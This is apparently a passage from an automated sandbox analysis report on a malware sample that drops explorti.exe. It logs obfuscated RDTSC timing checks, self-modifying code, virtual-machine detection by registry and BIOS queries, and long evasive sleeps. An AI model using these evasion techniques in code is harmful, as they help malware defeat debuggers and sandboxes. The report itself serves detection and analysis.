Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57308CB second address: 5730928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test eax, eax 0x0000000a jmp 00007FF34080AB17h 0x0000000f je 00007FF3B200DB80h 0x00000015 pushad 0x00000016 mov cl, 55h 0x00000018 call 00007FF34080AB11h 0x0000001d jmp 00007FF34080AB10h 0x00000022 pop eax 0x00000023 popad 0x00000024 mov ecx, eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF34080AB0Ch 0x0000002d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730928 second address: 573092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 573092E second address: 5730932 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730932 second address: 5730936 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730936 second address: 5730968 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b jmp 00007FF34080AB16h 0x00000010 and ecx, 1Fh 0x00000013 pushad 0x00000014 movzx ecx, dx 0x00000017 mov bh, 3Ch 0x00000019 popad 0x0000001a ror eax, cl 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730968 second address: 5730992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FF3408102FDh 0x0000000a and si, 5E16h 0x0000000f jmp 00007FF340810301h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730992 second address: 57309A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF34080AB0Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57309A2 second address: 57309C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b leave 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF340810300h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57309C8 second address: 57309CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 57309CE second address: 5730A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00D92014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007FF3451F0CE9h 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007FF340810300h 0x0000002b pop eax 0x0000002c jmp 00007FF340810300h 0x00000031 ret 0x00000032 nop 0x00000033 push eax 0x00000034 call 00007FF3451F0D06h 0x00000039 mov edi, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FF340810307h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730A22 second address: 5730A28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730A28 second address: 5730A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FF3408102FCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730A46 second address: 5730A4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730A4C second address: 5730A53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, ch 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 5730A53 second address: 5730A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 jmp 00007FF34080AB13h 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF34080AB15h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0028 second address: 56E0031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0031 second address: 56E0035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0035 second address: 56E0072 instructions: 0x00000000 rdtsc 0x00000002 call 00007FF3408102FFh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF340810300h 0x00000015 sub si, 1DF8h 0x0000001a jmp 00007FF3408102FBh 0x0000001f popfd 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0072 second address: 56E0077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0077 second address: 56E0092 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0092 second address: 56E0096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0096 second address: 56E009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E01B4 second address: 56E01B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E01B9 second address: 56E026C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF3408102FDh 0x00000009 add esi, 75E02D96h 0x0000000f jmp 00007FF340810301h 0x00000014 popfd 0x00000015 mov dh, ch 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b pushad 0x0000001c mov dl, cl 0x0000001e mov dx, 2EF6h 0x00000022 popad 0x00000023 mov dword ptr [esp], esi 0x00000026 pushad 0x00000027 movsx edi, cx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FF340810302h 0x00000031 adc si, 5018h 0x00000036 jmp 00007FF3408102FBh 0x0000003b popfd 0x0000003c mov ebx, esi 0x0000003e popad 0x0000003f popad 0x00000040 mov esi, dword ptr [ebp+08h] 0x00000043 pushad 0x00000044 mov edi, eax 0x00000046 pushad 0x00000047 push eax 0x00000048 pop edi 0x00000049 pushfd 0x0000004a jmp 00007FF340810306h 0x0000004f sbb esi, 3D9DB1A8h 0x00000055 jmp 00007FF3408102FBh 0x0000005a popfd 0x0000005b popad 0x0000005c popad 0x0000005d xchg eax, edi 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007FF340810305h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E026C second address: 56E033B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, E052h 0x00000007 push ebx 0x00000008 pop ecx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FF34080AB14h 0x00000012 xchg eax, edi 0x00000013 jmp 00007FF34080AB10h 0x00000018 test esi, esi 0x0000001a jmp 00007FF34080AB10h 0x0000001f je 00007FF3B2058E6Bh 0x00000025 pushad 0x00000026 mov cl, BEh 0x00000028 pushfd 0x00000029 jmp 00007FF34080AB13h 0x0000002e and eax, 7C8AE70Eh 0x00000034 jmp 00007FF34080AB19h 0x00000039 popfd 0x0000003a popad 0x0000003b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000042 pushad 0x00000043 mov al, 82h 0x00000045 pushad 0x00000046 push edx 0x00000047 pop ecx 0x00000048 movsx edi, cx 0x0000004b popad 0x0000004c popad 0x0000004d je 00007FF3B2058E31h 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007FF34080AB0Fh 0x0000005c xor si, 51CEh 0x00000061 jmp 00007FF34080AB19h 0x00000066 popfd 0x00000067 pushad 0x00000068 popad 0x00000069 popad 0x0000006a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E033B second address: 56E0341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0341 second address: 56E03D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, dword ptr [esi+44h] 0x0000000b pushad 0x0000000c mov ax, bx 0x0000000f pushfd 0x00000010 jmp 00007FF34080AB17h 0x00000015 add ch, FFFFFF8Eh 0x00000018 jmp 00007FF34080AB19h 0x0000001d popfd 0x0000001e popad 0x0000001f or edx, dword ptr [ebp+0Ch] 0x00000022 jmp 00007FF34080AB0Eh 0x00000027 test edx, 61000000h 0x0000002d jmp 00007FF34080AB10h 0x00000032 jne 00007FF3B2058DE1h 0x00000038 pushad 0x00000039 mov bx, cx 0x0000003c mov ah, 02h 0x0000003e popad 0x0000003f test byte ptr [esi+48h], 00000001h 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FF34080AB10h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E03D0 second address: 56E03FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FF3B205E5B8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FF340810305h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E03FC second address: 56E0402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0402 second address: 56E0435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810303h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test bl, 00000007h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF340810305h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0746 second address: 56D074C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D074C second address: 56D0750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0750 second address: 56D076D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF34080AB12h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D076D second address: 56D0773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0773 second address: 56D079F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FF34080AB0Eh 0x00000012 and esp, FFFFFFF8h 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D079F second address: 56D07A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D07A3 second address: 56D07C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D07C0 second address: 56D08A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 7772h 0x00000007 pushfd 0x00000008 jmp 00007FF340810303h 0x0000000d adc esi, 5EA0AD6Eh 0x00000013 jmp 00007FF340810309h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FF3408102FEh 0x00000022 push eax 0x00000023 pushad 0x00000024 mov edx, 2A46D394h 0x00000029 mov eax, ebx 0x0000002b popad 0x0000002c xchg eax, ebx 0x0000002d jmp 00007FF3408102FFh 0x00000032 xchg eax, esi 0x00000033 jmp 00007FF340810306h 0x00000038 push eax 0x00000039 pushad 0x0000003a mov ax, bx 0x0000003d pushfd 0x0000003e jmp 00007FF3408102FDh 0x00000043 or ax, D866h 0x00000048 jmp 00007FF340810301h 0x0000004d popfd 0x0000004e popad 0x0000004f xchg eax, esi 0x00000050 jmp 00007FF3408102FEh 0x00000055 mov esi, dword ptr [ebp+08h] 0x00000058 jmp 00007FF340810300h 0x0000005d sub ebx, ebx 0x0000005f jmp 00007FF340810301h 0x00000064 test esi, esi 0x00000066 push eax 0x00000067 push edx 0x00000068 push eax 0x00000069 push edx 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08A6 second address: 56D08AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08AA second address: 56D08AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08AE second address: 56D08B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08B4 second address: 56D08BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08BA second address: 56D08BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D08BE second address: 56D091D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FF3B2065DB4h 0x00000011 jmp 00007FF340810300h 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d jmp 00007FF340810300h 0x00000022 mov ecx, esi 0x00000024 jmp 00007FF340810300h 0x00000029 je 00007FF3B2065D8Ah 0x0000002f pushad 0x00000030 mov di, cx 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D091D second address: 56D09AA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF34080AB16h 0x00000008 xor cx, 5CB8h 0x0000000d jmp 00007FF34080AB0Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test byte ptr [76FB6968h], 00000002h 0x0000001d jmp 00007FF34080AB16h 0x00000022 jne 00007FF3B2060555h 0x00000028 jmp 00007FF34080AB10h 0x0000002d mov edx, dword ptr [ebp+0Ch] 0x00000030 jmp 00007FF34080AB10h 0x00000035 xchg eax, ebx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FF34080AB17h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D09AA second address: 56D09FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6DEDEB4Ah 0x00000008 mov edi, 7AA77216h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FF3408102FCh 0x00000016 xchg eax, ebx 0x00000017 jmp 00007FF340810300h 0x0000001c xchg eax, ebx 0x0000001d jmp 00007FF340810300h 0x00000022 push eax 0x00000023 jmp 00007FF3408102FBh 0x00000028 xchg eax, ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D09FA second address: 56D0A00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A4C second address: 56D0A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A52 second address: 56D0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A56 second address: 56D0A6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FF3408102FAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0A6B second address: 56D0AB0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF34080AB11h 0x00000009 add ecx, 5D1B2BA6h 0x0000000f jmp 00007FF34080AB11h 0x00000014 popfd 0x00000015 push esi 0x00000016 pop ebx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebx 0x0000001b jmp 00007FF34080AB0Ah 0x00000020 mov esp, ebp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0AB0 second address: 56D0AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56D0AB4 second address: 56D0AD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0C9C second address: 56E0D07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF340810306h 0x0000000f push eax 0x00000010 jmp 00007FF3408102FBh 0x00000015 xchg eax, ebp 0x00000016 jmp 00007FF340810306h 0x0000001b mov ebp, esp 0x0000001d pushad 0x0000001e mov ecx, 607BC2CDh 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FF340810308h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0D07 second address: 56E0D38 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB12h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF34080AB17h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E0D38 second address: 56E0D50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF340810304h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E09BE second address: 56E09C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\11NdzR12PS.exe	RDTSC instruction interceptor: First address: 56E09C3 second address: 56E09F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810302h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF340810307h 0x00000011 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\11NdzR12PS.exe	Special instruction interceptor: First address: D9EAC1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Special instruction interceptor: First address: F4CDBA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\11NdzR12PS.exe	Special instruction interceptor: First address: F759FE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 6FEAC1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 8ACDBA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 8D59FE instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\11NdzR12PS.exe

Code function: 0_2_05750D23 rdtsc

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1239	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 430	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1294	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 1276	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7804	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780	Thread sleep count: 1239 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7780	Thread sleep time: -2479239s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep count: 430 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7760	Thread sleep time: -12900000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7880	Thread sleep time: -540000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776	Thread sleep count: 1294 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7776	Thread sleep time: -2589294s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788	Thread sleep count: 1276 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7788	Thread sleep time: -2553276s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\11NdzR12PS.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: explorti.exe, explorti.exe, 00000005.00000002.2902292567.0000000000889000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 00000005.00000002.2903017790.0000000000F79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWX
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorti.exe, 00000005.00000002.2903017790.0000000000FB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWU+vE
